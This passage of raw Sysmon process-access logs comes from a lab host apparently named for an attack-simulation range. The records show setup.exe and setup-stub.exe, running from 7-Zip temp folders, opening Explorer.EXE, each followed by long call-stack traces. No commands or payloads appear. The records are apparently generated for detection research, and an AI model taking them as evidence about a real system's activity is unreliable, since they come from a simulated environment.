dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014651Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014650Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014649Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014648Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014647Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014646Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64) 10341000x800000000000000014645Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014644Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014643Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014634Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.255{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\window